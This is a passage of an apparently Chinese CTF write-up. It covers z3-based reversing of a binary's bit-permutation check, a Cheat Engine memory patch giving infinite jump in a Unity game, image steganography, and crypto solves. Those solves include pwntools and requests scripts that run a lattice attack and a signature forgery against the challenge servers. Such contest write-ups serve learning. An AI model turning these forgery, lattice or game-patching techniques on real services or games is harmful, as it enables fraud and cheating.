for (int j = 0; j < 6; ++j)
{
int v20 = 6 * k + j;
int v21 = v20 & 7;
if (v20 < 0)
{
v20 += 7;
v21 -= 8;
}
int v23 = v20 >> 3;
int v24 = 7 - v21;
char v25 = v38[v23];
for (int z = 0; z < 7; ++z)
{
int v26 = j + 6 * ((v33[z] + k) % 32);
int v27 = (j + 6 * ((v33[z] + k) % 32)) & 7;
if (v26 < 0)
{
v26 += 7;
v27 -= 8;
}
v25 ^= ((input[v26 >> 3] >> (7 - v27)) & 1) << v24;
}
v38[v23] = v25;
}
}
for (int k = 0; k < 24; ++k)
input[k] = v38[k] ^ box[24 + k + 24 * i];
}
sub_7FF76BB31064(input);
sub_7FF76BB311B8(input);
sub_7FF76BB31064(input);
for (int i = 0; i < 24; ++i)
{
input[i] ^= sb[i];
}
char cmp[] = {0xE4, 0xE1, 0x3E, 0x41, 0x25, 0x9D, 0x37, 0xC8, 0xFC, 0xDE, 0x92, 0x02, 0x3A, 0xBA, 0x61, 0x5F, 0xFA, 0x16, 0xA8, 0xC3, 0x20, 0x96, 0x14, 0x35};
print_input(cmp);
if (!strncmp(input, cmp, 24))
printf("success");
}然后分为sub_7FF76BB31064,sub_7FF76BB311B8,main内循环三个部分用z3求解
sub_7FF76BB31064部分:这里约束分为两个步骤 首先是求出v11,然后字典找到v13,最后求input
// 约束生成代码 1 output 到 v11
// look.c
#include <stdio.h>
#include <string.h>
void sub_7FF76BB31064(char *a1)
{
int i = 0; // er10
unsigned char v3 = 0; // r11
int v4 = 0; // edi
int v5 = 0; // er8
int j = 0; // ebx
int v7 = 0; // eax
char v8 = 0; // dl
char v9 = 0; // cl
int v10 = 0; // ebx
unsigned char v11[32] = {0}; // si
int v12 = 0; // eax
char v13 = 0; // r11
char v14 = 0; // cl
unsigned char *result; // rax
long long v16 = 0; // xmm1_8
unsigned char v17[24] = {0};
for (i = 0; i < 32; ++i)
{
v3 = 0;
v4 = 6 * i;
v5 = 0;
v10 = 0;
do
{
v12 = v4 + v10;
v13 = (v4 + v10) & 7;
if (v4 + v10 < 0)
{
v12 += 7;
v13 -= 8;
}
v14 = 5 - v10++;
v17[v12 >> 3] ^= ((v11[i] >> v14) & 1) << (7 - v13);
if (v12 % 8 == 0)
printf("temp = 0\n");
printf("temp ^= ((v11[%d] >> %d) & 1) << (7 - %d)\n", i, v14, v13);
if (v12 % 8 == 7)
printf("s.add(v17[%d] == temp)\n", v12 >> 3);
} while (v10 < 6); // 5个式子
}
memcpy(a1, v17, 24);
}
void print_input(char *input)
{
for (int i = 0; i < 24; ++i)
{
printf("%d,", (unsigned char)input[i]);
}
}
int main()
{
char input[] = "123456789012345678901234";
sub_7FF76BB31064(input);
return 0;
}
// 约束生成代码2 v13到input
// look2.c
#include <stdio.h>
#include <string.h>
unsigned char byte_7FF76BB333A0[] =
{
0x00, 0x36, 0x30, 0x0D, 0x0F, 0x12, 0x35, 0x23, 0x19, 0x3F,
0x2D, 0x34, 0x03, 0x14, 0x29, 0x21, 0x3B, 0x24, 0x02, 0x22,
0x0A, 0x08, 0x39, 0x25, 0x3C, 0x13, 0x2A, 0x0E, 0x32, 0x1A,
0x3A, 0x18, 0x27, 0x1B, 0x15, 0x11, 0x10, 0x1D, 0x01, 0x3E,
0x2F, 0x28, 0x33, 0x38, 0x07, 0x2B, 0x2C, 0x26, 0x1F, 0x0B,
0x04, 0x1C, 0x3D, 0x2E, 0x05, 0x31, 0x09, 0x06, 0x17, 0x20,
0x1E, 0x0C, 0x37, 0x16};
void sub_7FF76BB31064(char *a1)
{
int i; // er10
unsigned char v3; // r11
int v4; // edi
int v5; // er8
int j; // ebx
int v7; // eax
char v8; // dl
char v9; // cl
int v10; // ebx
unsigned char v11[32] = {0}; // si
int v12; // eax
char v13; // r11
char v14; // cl
unsigned char *result; // rax
long long v16; // xmm1_8
unsigned char v17[24] = {0};
int tot = 0;
for (i = 0; i < 32; ++i)
{
v3 = 0;
v4 = 6 * i;
v5 = 0;
for (j = 5; j > -1; --j)
{
v7 = v4 + v5;
v8 = (v4 + v5) & 7;
if (v4 + v5 < 0)
{
v7 += 7;
v8 -= 8;
}
++v5;
v9 = j;
v3 ^= ((a1[v7 >> 3] >> (7 - v8)) & 1) << v9;
if (tot % 6 == 0)
printf("temp = 0\n");
printf("temp ^= ((a1[%d] >> (7 - %d)) & 1) << %d\n", v7 >> 3, v8, v9);
if (tot % 6 == 5)
printf("s.add(temp == find[%d])\n", i);
tot++;
}
v10 = 0;
v11[i] = byte_7FF76BB333A0[v3];
}
memcpy(a1, v17, 24);
}
int main()
{
char input[] = "123456789012345678901234";
sub_7FF76BB31064(input);
return 0;
}z3 求解脚本:https://www.luogu.com.cn/paste/gdydaljf
(z3脚本太大 都以云剪贴板的形式提供,luogu应该不会崩)
sub_7FF76BB311B8部分:
// 约束代码生成
// look2.c
#include <stdio.h>
#include <string.h>
void sub_7FF76BB311B8(char *a1)
{
int i; // er8
int v3; // er10
int v4; // ebx
long long v5; // rdi
int v6; // eax
char v7; // r11
int v8; // ecx
int v9; // edx
unsigned char *result; // rax
long long v11; // xmm1_8
unsigned char v12[24] = {0};
int tot = 0;
for (i = 0; i < 192; i += 6)
{
v3 = i;
v4 = i;
v5 = 6;
do
{
v6 = v3;
v7 = v3 & 7;
if (v3 < 0)
{
v6 = v3 + 7;
v7 -= 8;
}
v8 = v4 % 192;
v9 = (v4 % 192) & 7;
if (v4 % 192 < 0)
{
v8 += 7;
v9 -= 8;
}
++v3;
v4 += 7;
v12[v6 >> 3] ^= ((a1[v8 >> 3] >> (7 - v9)) & 1) << (7 - v7);
if (tot % 8 == 0)
printf("temp = 0\n");
printf("temp ^= ((a1[%d] >> (7 - %d)) & 1) << (7 - %d)\n", v8 >> 3, v9, v7);
if (tot % 8 == 7)
printf("s.add(temp == v12[%d])\n", v6 >> 3);
tot++;
--v5;
} while (v5);
}
memcpy(a1, v12, 24);
}
void print_input(char *input)
{
for (int i = 0; i < 24; ++i)
{
printf("%d,", (unsigned char)input[i]);
}
}
int main()
{
char input[] = "123456789012345678901234";
sub_7FF76BB311B8(input);
print_input(input);
return 0;
}z3约束脚本:https://www.luogu.com.cn/paste/k58tlpv9
main内循环部分:
// 约束带吗生成
// look4.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
unsigned char box[24 * 9] =
{
0x33, 0x37, 0x64, 0x35, 0x39, 0x66, 0x37, 0x61, 0x32, 0x66,
0x37, 0x64, 0x63, 0x34, 0x30, 0x63, 0x61, 0x30, 0x34, 0x61,
0x37, 0x62, 0x30, 0x73, 0x5F, 0x5F, 0xA9, 0x21, 0xFA, 0xED,
0xF1, 0x36, 0xA6, 0xCD, 0xD9, 0x87, 0x9D, 0x5A, 0x90, 0xD5,
0x0F, 0x71, 0x67, 0x0E, 0x37, 0xFF, 0xA1, 0x78, 0x58, 0x05,
0xFD, 0x07, 0x3A, 0xD8, 0x47, 0xBC, 0xD0, 0x04, 0x3E, 0x33,
0x08, 0x3E, 0xDD, 0x21, 0xB1, 0x71, 0xEB, 0x13, 0x53, 0x5E,
0x58, 0x05, 0x12, 0x23, 0x77, 0x00, 0x30, 0xCC, 0xA4, 0x2E,
0x66, 0x4B, 0xD0, 0x56, 0xC7, 0x7D, 0xE9, 0x44, 0x17, 0x76,
0x47, 0x8A, 0x18, 0x02, 0xD2, 0x26, 0x75, 0xCF, 0x1F, 0xB3,
0x5E, 0xD7, 0x28, 0x6A, 0x04, 0x7A, 0xEB, 0x61, 0x1F, 0x9F,
0x61, 0x9C, 0xA8, 0x25, 0x3C, 0x43, 0x6F, 0xCF, 0xD5, 0xAF,
0xB0, 0x92, 0xDC, 0xD3, 0x61, 0xE7, 0xA4, 0xAA, 0xC2, 0xC2,
0x3C, 0x57, 0xDD, 0x1A, 0xB3, 0x0B, 0x83, 0x55, 0x16, 0x88,
0x0D, 0xDD, 0x6E, 0x3D, 0x8F, 0x59, 0x49, 0xCD, 0x2C, 0x8D,
0x6E, 0x10, 0x6E, 0x53, 0xE5, 0xDA, 0xE2, 0x64, 0x68, 0xE8,
0x19, 0xA9, 0x60, 0x9C, 0xB5, 0xF2, 0x03, 0xFF, 0xC2, 0xB2,
0xCC, 0xF1, 0xB3, 0x9C, 0x4E, 0xA1, 0x77, 0xF0, 0xBA, 0x99,
0x36, 0xC0, 0x42, 0x71, 0xFC, 0x90, 0xBF, 0x72, 0x17, 0xD5,
0xCD, 0xDF, 0x73, 0xEA, 0x1C, 0xCC, 0x40, 0x9E, 0xCB, 0xAC,
0x4A, 0x82, 0x84, 0x35, 0x85, 0x97, 0xBE, 0xEA, 0x2E, 0x3A,
0x83, 0xEA, 0xC5, 0xF2, 0xC5, 0xE0};
unsigned char byte_7FF76BB333A0[] =
{
0x00, 0x36, 0x30, 0x0D, 0x0F, 0x12, 0x35, 0x23, 0x19, 0x3F,
0x2D, 0x34, 0x03, 0x14, 0x29, 0x21, 0x3B, 0x24, 0x02, 0x22,
0x0A, 0x08, 0x39, 0x25, 0x3C, 0x13, 0x2A, 0x0E, 0x32, 0x1A,
0x3A, 0x18, 0x27, 0x1B, 0x15, 0x11, 0x10, 0x1D, 0x01, 0x3E,
0x2F, 0x28, 0x33, 0x38, 0x07, 0x2B, 0x2C, 0x26, 0x1F, 0x0B,
0x04, 0x1C, 0x3D, 0x2E, 0x05, 0x31, 0x09, 0x06, 0x17, 0x20,
0x1E, 0x0C, 0x37, 0x16};
void sub_7FF76BB31064(char *a1)
{
int i; // er10
unsigned char v3; // r11
int v4; // edi
int v5; // er8
int j; // ebx
int v7; // eax
char v8; // dl
char v9; // cl
int v10; // ebx
unsigned char v11; // si
int v12; // eax
char v13; // r11
char v14; // cl
unsigned char *result; // rax
long long v16; // xmm1_8
unsigned char v17[24] = {0};
for (i = 0; i < 32; ++i)
{
v3 = 0;
v4 = 6 * i;
v5 = 0;
for (j = 5; j > -1; --j)
{
v7 = v4 + v5;
v8 = (v4 + v5) & 7;
if (v4 + v5 < 0)
{
v7 += 7;
v8 -= 8;
}
++v5;
v9 = j;
v3 ^= ((a1[v7 >> 3] >> (7 - v8)) & 1) << v9;
}
v10 = 0;
v11 = byte_7FF76BB333A0[v3];
do
{
v12 = v4 + v10;
v13 = (v4 + v10) & 7;
if (v4 + v10 < 0)
{
v12 += 7;
v13 -= 8;
}
v14 = 5 - v10++;
v17[v12 >> 3] ^= ((v11 >> v14) & 1) << (7 - v13);
} while (v10 < 6); // 5个式子
}
memcpy(a1, v17, 24);
}
void sub_7FF76BB311B8(char *a1)
{
int i; // er8
int v3; // er10
int v4; // ebx
long long v5; // rdi
int v6; // eax
char v7; // r11
int v8; // ecx
int v9; // edx
unsigned char *result; // rax
long long v11; // xmm1_8
unsigned char v12[24] = {0};
for (i = 0; i < 192; i += 6)
{
v3 = i;
v4 = i;
v5 = 6;
do
{
v6 = v3;
v7 = v3 & 7;
if (v3 < 0)
{
v6 = v3 + 7;
v7 -= 8;
}
v8 = v4 % 192;
v9 = (v4 % 192) & 7;
if (v4 % 192 < 0)
{
v8 += 7;
v9 -= 8;
}
++v3;
v4 += 7;
v12[v6 >> 3] ^= ((a1[v8 >> 3] >> (7 - v9)) & 1) << (7 - v7);
--v5;
} while (v5);
}
memcpy(a1, v12, 24);
}
void print_input(char *input)
{
for (int i = 0; i < 24; ++i)
{
printf("%d,", (unsigned char)input[i]);
}
}
int main()
{
char input[] = "123456789012345678901234";
unsigned char sb[] = {0x11, 0xA1, 0x33, 0x03, 0x1B, 0xAB, 0x3B, 0xA3, 0x83, 0xB3, 0xA9, 0xA3, 0x81, 0xBB, 0x39, 0x13, 0x03, 0x3B, 0x19, 0x0B, 0x2D, 0x99, 0x21, 0x91};
int tot = 0;
for (int i = 0; i < 1; ++i) // 改为了一次
{
int v33[] = {0, 1, 5, 9, 0xF, 0x15, 0x1A};
char v38[24] = {0};
for (int k = 0; k < 32; ++k)
{
for (int j = 0; j < 6; ++j)
{
int v20 = 6 * k + j;
int v21 = v20 & 7;
if (v20 < 0)
{
v20 += 7;
v21 -= 8;
}
int v23 = v20 >> 3;
int v24 = 7 - v21;
for (int z = 0; z < 7; ++z)
{
int v26 = j + 6 * ((v33[z] + k) % 32);
int v27 = (j + 6 * ((v33[z] + k) % 32)) & 7;
if (v26 < 0)
{
v26 += 7;
v27 -= 8;
}
v38[v23] ^= ((input[v26 >> 3] >> (7 - v27)) & 1) << v24;
if (tot % 56 == 0)
printf("temp = 0\n");
printf("temp ^= ((input[%d] >> (7 - %d)) & 1) << %d\n", v26 >> 3, v27, v24);
if (tot % 56 == 55)
printf("s.add(temp == v38[%d])\n", v23);
tot++;
}
}
}
strcpy(input, v38);
}
print_input(input);
return 0;
}z3约束脚本:https://www.luogu.com.cn/paste/emlw2khc
然后其中两次异或的值都可以动调调试出来(前面的复现源码已经提供)
之后再逆向分别调用脚本并且异或得出flag
from z3 import *
import os
sb = [0x11, 0xA1, 0x33, 0x03, 0x1B, 0xAB, 0x3B, 0xA3, 0x83, 0xB3, 0xA9, 0xA3, 0x81, 0xBB, 0x39, 0x13, 0x03, 0x3B, 0x19, 0x0B, 0x2D, 0x99, 0x21, 0x91]
box = [0x33, 0x37, 0x64, 0x35, 0x39, 0x66, 0x37, 0x61, 0x32, 0x66,
0x37, 0x64, 0x63, 0x34, 0x30, 0x63, 0x61, 0x30, 0x34, 0x61,
0x37, 0x62, 0x30, 0x73, 0x5F, 0x5F, 0xA9, 0x21, 0xFA, 0xED,
0xF1, 0x36, 0xA6, 0xCD, 0xD9, 0x87, 0x9D, 0x5A, 0x90, 0xD5,
0x0F, 0x71, 0x67, 0x0E, 0x37, 0xFF, 0xA1, 0x78, 0x58, 0x05,
0xFD, 0x07, 0x3A, 0xD8, 0x47, 0xBC, 0xD0, 0x04, 0x3E, 0x33,
0x08, 0x3E, 0xDD, 0x21, 0xB1, 0x71, 0xEB, 0x13, 0x53, 0x5E,
0x58, 0x05, 0x12, 0x23, 0x77, 0x00, 0x30, 0xCC, 0xA4, 0x2E,
0x66, 0x4B, 0xD0, 0x56, 0xC7, 0x7D, 0xE9, 0x44, 0x17, 0x76,
0x47, 0x8A, 0x18, 0x02, 0xD2, 0x26, 0x75, 0xCF, 0x1F, 0xB3,
0x5E, 0xD7, 0x28, 0x6A, 0x04, 0x7A, 0xEB, 0x61, 0x1F, 0x9F,
0x61, 0x9C, 0xA8, 0x25, 0x3C, 0x43, 0x6F, 0xCF, 0xD5, 0xAF,
0xB0, 0x92, 0xDC, 0xD3, 0x61, 0xE7, 0xA4, 0xAA, 0xC2, 0xC2,
0x3C, 0x57, 0xDD, 0x1A, 0xB3, 0x0B, 0x83, 0x55, 0x16, 0x88,
0x0D, 0xDD, 0x6E, 0x3D, 0x8F, 0x59, 0x49, 0xCD, 0x2C, 0x8D,
0x6E, 0x10, 0x6E, 0x53, 0xE5, 0xDA, 0xE2, 0x64, 0x68, 0xE8,
0x19, 0xA9, 0x60, 0x9C, 0xB5, 0xF2, 0x03, 0xFF, 0xC2, 0xB2,
0xCC, 0xF1, 0xB3, 0x9C, 0x4E, 0xA1, 0x77, 0xF0, 0xBA, 0x99,
0x36, 0xC0, 0x42, 0x71, 0xFC, 0x90, 0xBF, 0x72, 0x17, 0xD5,
0xCD, 0xDF, 0x73, 0xEA, 0x1C, 0xCC, 0x40, 0x9E, 0xCB, 0xAC,
0x4A, 0x82, 0x84, 0x35, 0x85, 0x97, 0xBE, 0xEA, 0x2E, 0x3A,
0x83, 0xEA, 0xC5, 0xF2, 0xC5, 0xE0]
output = [] # 228,225,62,65,37,157,55,200,252,222,146,2,58,186,97,95,250,22,168,195,32,150,20,53,
res = []
def sub_7FF76BB31064():
if os.system('python ./b.py') == 0:
print('sub_7FF76BB31064 success')
else:
print('sub_7FF76BB31064 error')
def sub_7FF76BB311B8():
if os.system('python ./c.py') == 0:
print('sub_7FF76BB311B8 success')
else:
print('sub_7FF76BB311B8 error')
def www():
if os.system('python ./d.py') == 0:
print('www success')
else:
print('www error')
output = []
with open('output','rb+') as f:
s = f.read().decode()
s = s.split(',')
for i in range(len(s)-1):
output.append(int(s[i]))
for i in range(len(output)):
res.append(output[i] ^ sb[i])
print(res)
with open('output','w+') as f:
for i in range(len(res)):
print(res[i],end=',',file=f)
sub_7FF76BB31064()
sub_7FF76BB311B8()
sub_7FF76BB31064()
for i in range(7,-1,-1):
print('time %d'%i)
output = []
res = []
with open('output','rb+') as f:
s = f.read().decode()
s = s.split(',')
for k in range(len(s)-1):
output.append(int(s[k]))
for k in range(len(output)):
res.append(output[k] ^ box[24 + k + 24 * i])
with open('output','w+') as f:
for k in range(len(res)):
print(res[k],end=',',file=f)
www()
sub_7FF76BB311B8()
sub_7FF76BB31064()
sub_7FF76BB311B8()
sub_7FF76BB31064()
print('\n')
output = []
res = []
with open('output','rb+') as f:
s = f.read().decode()
s = s.split(',')
for i in range(len(s)-1):
output.append(int(s[i]))
for i in range(len(output)):
res.append(output[i] ^ box[i])
with open('output','w+') as f:
for i in range(len(res)):
print(res[i],end=',',file=f)
print('\n')
sub_7FF76BB31064()
sub_7FF76BB311B8()
sub_7FF76BB31064()
output = []
with open('output','rb+') as f:
s = f.read().decode()
s = s.split(',')
for i in range(len(s)-1):
output.append(int(s[i]))
print(output)
for i in range(len(output)):
print(chr(output[i]),end='')
# 91,143,45,174,250,174,246,228,179,110,109,57,220,13,123,70,189,52,40,142,58,234,7,23,
# 228,225,62,65,37,157,55,200,252,222,146,2,58,186,97,95,250,22,168,195,32,150,20,53,MISC
Check in
FPS_game
打开游戏后 发现 说flag is up on
因为自己是做外挂的,所以很清楚知道 我们要做一个无限跳,unity游戏的判定为BOOL类型,所以CE直接附加去获取
可以获取到该位置为跳跃判定写入的地方
根据汇编读了一下逻辑,可以判断这个位置写入0改成1即可实现跳跃为地板
直接跳越
Lisa's cat
Description
Where is the cat?
Analyze
开始一张图,首先想到之前的题,看了看Ycrcb的各个的最低位
from PIL import Image
import numpy as np
from matplotlib import pyplot as plt
p = Image.open('lisa_wm.png').convert('YCbCr')
p_data = np.array(p)
a,b = p_data.shape[0],p_data.shape[1]
Y = p_data[:,:,0].reshape(a*b)
Cb = p_data[:,:,1].reshape(a*b)
Cr = p_data[:,:,2].reshape(a*b)
# Y = p_data[:,:,0]
print(Y.shape,Cb.shape,Cr.shape)
res = []
for i in Y:
res.append(i%2)
r2Y = np.array(res).reshape(a,b)
plt.imshow(r2Y)
plt.show()
res = []
for i in Cb:
res.append(i%2)
r2Cr = np.array(res).reshape(a,b)
plt.imshow(r2Cr)
plt.show()
res = []
for i in Cr:
res.append(i%2)
r2Cb = np.array(res).reshape(a,b)
plt.imshow(r2Cb)
plt.show()
发现
里面有个Hello202166
然后hint:Cat is algo说是有种猫的算法,稍微fuzz了一下找到是猫脸置乱,然后我们找到r0层的图像很奇怪而且和正常图片的r0不同
水印图片r0:
正常图片r0:
于是提取后对r0进行猫眼置换,爆破后发现参数a=20,b=21也正和前面的Hello202166对应(要不是爆破出来真找不到)
import numpy as np
from PIL import Image
def dearnold(img,a,b):
r, c = img.shape[0],img.shape[1]
p = np.zeros((r, c), np.uint8)
a = a
b = b
for i in range(r):
for j in range(c):
x = ((a * b + 1) * i - b * j) % r
y = (-a * i + j) % c
p[x, y] = img[i, j]
return p
p = np.array(Image.open('te4.png').convert('L'))
for a in range(30):
for b in range(30):
p = dearnold(p,a,b)
Image.fromarray(p,'L').save('out/'+str(a)+','+str(b)+'.png')
然后得到第二个猫图
这里十分模糊,怀疑是lisa原图片导致的,于是PS处理了一下lisa的R0图片
这里将白点黑点去了,然后对其进行和原R0图片的xor已提取出猫眼置乱里面大部分有用的数据像素,得到图片
进行猫眼置乱后得到
import numpy as np
from PIL import Image
def dearnold(img):
r, c = img.shape[0],img.shape[1]
p = np.zeros((r, c), np.uint8)
a = 20
b = 21
for i in range(r):
for j in range(c):
x = ((a * b + 1) * i - b * j) % r
y = (-a * i + j) % c
p[x, y] = img[i, j]
return p
p = np.array(Image.open('te3.png').convert('L'))
count = 0
print(count)
p = dearnold(p)
# if count == 66*66//2:
# break
Image.fromarray(p,'L').save('out/'+str(count)+'.png')
# count+=1
flag
ByteCTF{the Multimedia Security in ByteDance!}Undercover
题目是一张图片,打开图片链接为:
根据题目提示,将url中的img修改为origin,并删除url中不必要的部分,得到如下图片:
https://p3.toutiaoimg.com/origin/tos-cn-i-qvj2lq49k0/7a19b5d53d014130ab3c00f73a8d4645
用010editor打开可以发现该图有exif信息,标记了作者为Zach Oakes
搜索一下该作者名字,即可发现一个pixeljihad工具
将origin图片利用该在线网站解密一下即可得到flag
问卷
Crypto
overheard_plus
得到的数形式为 $y=(h<<223)+(x<<33)+l$
其中h,l未知
乘一个系数k,使得 $(k<<223)\quad mod\quad p , k$ 都比较小
构造格即可求出k
p = 87943484917385208152646744649043342751374728160181853034892216825574906226251
A = [[1,2^223,1],[0,p,0],[0,0,p]]
A = matrix(A)
print(A.LLL()[1])(-407264873754589862949021245515678128869, -169966136630445589168644392667586870802, -407264873754589862949021245515678128869)
得到k为407264873754589862949021245515678128869
然后就转化为HNP问题
from pwn import *
from random import*
p = 87943484917385208152646744649043342751374728160181853034892216825574906226251
g = 12
bits = 33
mark = (1 << (256 - bits)) - 1
sh=remote("47.94.238.93","30001")
sh.recv().decode()
sh.sendline(b"1")
a=int(sh.recvuntil(b"\n",drop=True).decode())
print(sh.recvuntil(b"$ "))
sh.sendline(b"2")
b=int(sh.recvuntil(b"\n",drop=True).decode())
sh.recvuntil(b"$ ")
sh.sendline(b"3")
sh.sendline(str(a).encode())
sh.recvuntil(b"Bob: ")
r=(int(sh.recvuntil(b"\n").decode()))
sh.recvuntil(b"$ ")
cnt=0
k=407264873754589862949021245515678128869
B=[]
A=[]
for i in range(1,10):
sh.sendline(b"3")
sh.sendline(str(a*pow(g,i,p)%p).encode())
sh.recvuntil(b"Bob: ")
B.append(int(sh.recvuntil(b"\n").decode())*k%p)
A.append(pow(b,i,p)*k%p)
sh.recvuntil(b"$ ")
M=[]
s=5
k=1
for i in range(s):
l=[0]*s
l[i]=p*k
if(i==s-2):
for j in range(s-2):
l[j]=A[j]*k
if(i==s-1):
for j in range(s-2):
l[j]=B[j]*k
M.append(l)
M[-1][-1]=2^160
m=M.copy()
m[-2][-2]=1/2^90
m=matrix(QQ,m)
print(m.LLL()[0][-1])
print(m[-1][-1])
sh.sendline(b'4')
sh.sendline(str(abs(m.LLL()[0][-2]*2^90)%p).encode())
print(sh.recvall())forgery
from Crypto.Util.number import *
from Crypto.Cipher import AES
from random import randint
from hashlib import sha256
from curve import *
import requests
url = 'http://47.94.238.93:30002/'
Q_P_hex = '6a04ab98d9e4774ad806e302dddeb63bea16b5cb5f223ee77478e861bb583eb3' \
'36b6fbcb60b5b3d4f1551ac45e5ffc4936466e7d98f6c7c0ec736539f74691a6'
M_hex = '654791f7bca3e1815565f63614b59bed6a0b99c3ed19098151d3f0f95cbba40a' \
'890459f6459ff42449933fec80cd2ca5c3613f28491a26554e15de1dffd374f7'
Z_hex = '511431636a07ec6eb9d54cfda8aa559b3c09d9ff99ec84af9bcb87c47170e324' \
'4d5c0b3d4d3692647ab92007454a2f6b6b88a860662a8e87a824284f3111b4be'
s_hex = '3c0cb0d73eb950f85b6d2f51ebc6223eba41191357a2c15f3fafa05d956d0675'
e_hex = 'cb562bf69faa92cdcb7ab2cc447f06516a01fb7c46ebcf143bba8d02ef074541'
K_hex = 'f7b804d4ca67eae2b9252a8fe4e4f0b329d1156124227e6cb0cbeb130318dd29' \
'c614cbbfb21909516e65cfad3d650c65246e016b36e55635036e93c05d4bf045'
f_hex = '53e53621c90abe1fd78a555a62474c31c9fb5b1a339a9472b914e9b8f089d721'
v_hex = '4898a5d7c579946a7c9e2ed05fb313b868884d6880a099645895d17ea77bf87f'
def H(msg):
return int(sha256(msg).hexdigest(), 16)
def get_x(point):
res = long_to_bytes(point.x)
res = b'\x00'* (32-len(res)) + res
return res
def Make_Point(hexdata, Negate=False):
assert len(hexdata) == 128
return Point(int(hexdata[:64], 16), int(hexdata[64:], 16))
def get_Negate(point):
hexdata = str(point)
return Point(int(hexdata[:64], 16), -1*int(hexdata[64:], 16))
Q_P = Make_Point(Q_P_hex)
M = Make_Point(M_hex)
Z = Make_Point(Z_hex)
K = Make_Point(K_hex)
s = int(s_hex, 16)
e = int(e_hex, 16)
f = int(f_hex, 16)
v = int(v_hex, 16)
mycurve = curve()
n = mycurve.order
G = mycurve.G
def get_pubkey():
r = requests.get(url+'forgery/pks')
data = r.text.split(',')
pubkey = [Point(int(i[:64], 16), int(i[64:], 16)) for i in data]
return pubkey
def connect(req):
return requests.get(url+'forgery/req',data=req).text
pubkey = get_pubkey()
for Q_o in pubkey:
R = s * G + e * get_Negate(Q_P) + e * Q_o + Z
tmp = get_x(R) + get_x(M)
if H(tmp) == e:
# print(Q_o)
break
a, b, m, s = (randint(1, n) for i in range(4))
M = m * G
R = b * G + (a+b) * get_Negate(Q_P) + a * get_Negate(K + K.x * Q_o)
e = H(get_x(R) + get_x(M))
Z = R + get_Negate(s * G + e * Q_o + e * get_Negate(Q_P))
resp = connect(str(M) + str(Z) + hex(s)[2:] + hex(e)[2:])
L, C = resp[:128], long_to_bytes(int(resp[128:], 16))
Y = m * Make_Point(L)
sk = long_to_bytes(H(get_x(Y)))
iv, cipher, tag = C[:12], C[12:-16], C[-16:]
cip = AES.new(sk, AES.MODE_GCM, iv)
plaintext = cip.decrypt_and_verify(cipher, tag)
print(plaintext)GodOnlyKnows
因为p和q都比m大,所以 $m \quad mod \quad p =m$
因为 e|(q-1),所以采用AMM算法直接开根
第一个E可以分解,所以分两次开根
第二个开根后寻找多解即可
from Crypto.Util.number import long_to_bytes
from tqdm import tqdm
import random
import time
def AMM(o, r, q):
start = time.time()
# print('\n----------------------------------------------------------------------------------')
# print('Start to run Adleman-Manders-Miller Root Extraction Method')
# print('Try to find one {:#x}th root of {} modulo {}'.format(r, o, q))
g = GF(q)
o = g(o)
p = g(random.randint(1, q))
while p ^ ((q-1) // r) == 1:
p = g(random.randint(1, q))
# print('[+] Find p:{}'.format(p))
t = 0
s = q - 1
while s % r == 0:
t += 1
s = s // r
# print('[+] Find s:{}, t:{}'.format(s, t))
k = 1
while (k * s + 1) % r != 0:
k += 1
alp = (k * s + 1) // r
# print('[+] Find alp:{}'.format(alp))
a = p ^ (r**(t-1) * s)
b = o ^ (r*alp - 1)
c = p ^ s
h = 1
for i in range(1, t):
d = b ^ (r^(t-1-i))
if d == 1:
j = 0
else:
# print('[+] Calculating DLP...')
j = - discrete_log(d, a)
# print('[+] Finish DLP...')
b = b * (c^r)^j
h = h * c^j
c = c^r
result = o^alp * h
end = time.time()
# print("Finished in {} seconds.".format(end - start))
# print('Find one solution: {}'.format(result))
return result
def findAllPRoot(p, e):
print("Start to find all the Primitive {:#x}th root of 1 modulo {}.".format(e, p))
start = time.time()
proot = set()
while len(proot) < e:
proot.add(pow(random.randint(2, p-1), (p-1)//e, p))
end = time.time()
print("Finished in {} seconds.".format(end - start))
return proot
def findAllPRoot(p, e):
# print("Start to find all the Primitive {:#x}th root of 1 modulo {}.".format(e, p))
start = time.time()
proot = set()
while len(proot) < e:
proot.add(pow(random.randint(2, p-1), (p-1)//e, p))
end = time.time()
# print("Finished in {} seconds.".format(end - start))
return proot
def findAllSolutions(mp, proot, cp, p):
# print("Start to find all the {:#x}th root of {} modulo {}.".format(e, cp, p))
start = time.time()
all_mp = set()
for root in proot:
mp2 = mp * root % p
assert(pow(mp2, e, p) == cp)
all_mp.add(mp2)
end = time.time()
# print("Finished in {} seconds.".format(end - start))
return all_mp
c = 772565936593515938615082083850938362613089734342287771128291472104046319862613350056956062118550321631866813148814858579940359488835406488192045892079962698714252480664060419953439936847467151951707711960564168524184204271995270327245725984919428149639973357868675592483006928997726613457380488261635041869597307398729507697158613168850704328530399405169680463230053377431335337779463633029295955858696902803386120356749863623596613941801330124207586725374756181745511923539633446661442068957315168820238937280405617065015285700322895085706754898061230539082769025995120039459396808799117648271570269985484502094854
p = 95687551158424870143703739707287468414611369850139196417287508089211979118193675929506850803149358301728120409275929342331337905599313606088428402839878372487170692490462929725396373203204226843802423181196898778481793325131946863940863769074896156910428463093571864657722422072768906417568334359470218805533
e = 211
cp = c % p
mp = AMM(cp, e, p)
mp = 31345202442790442920115697500450071818235900375500159009967056807830626140001529729676300258209996171069560742047328078130191327123345680723213339636646321741052218138744674334328183312558923865595390705797974430312426267394255850679294885677465520683090066528255100591795102268647400226323338312621641629616
p_proot = findAllPRoot(p, e)
mps = findAllSolutions(mp, p_proot, cp, p)
e = 44111
p_proot2 = findAllPRoot(p, e)
for i in tqdm(mps):
ans = AMM(i, e, p)
roots = findAllSolutions(ans, p_proot2, i, p)
for j in roots:
tmp = long_to_bytes(j)
if tmp[:1] == b'(' and tmp[-1:] == b')' and b', ' in tmp:
print(tmp)from Crypto.Util.number import bytes_to_long, long_to_bytes
A = 792238572269794055348910087761887177847370603197600830370527259419768807858348001691036300215434808111877711734709055694630017772989997444234251
q = 1681729884196728426347201605286291421761851787915662035433940062673379044738871872632638818413406117567884236926797281113873191085369214060655427
ms = b'\xdd\x13\xb3\x03\xbbeX4\x96 \xd4f\xff\xbfX",\xeac\x08\xa1O\xacdx\xf6\x98\xc7%.r\xf6[\n\xa2\x0f\xa0\xbf\x9a\xe4yJ\xe3\xf9\xd4\xad\xd9\t\x14N\xd2]\xb3\\q0_\xe0z\xf3'
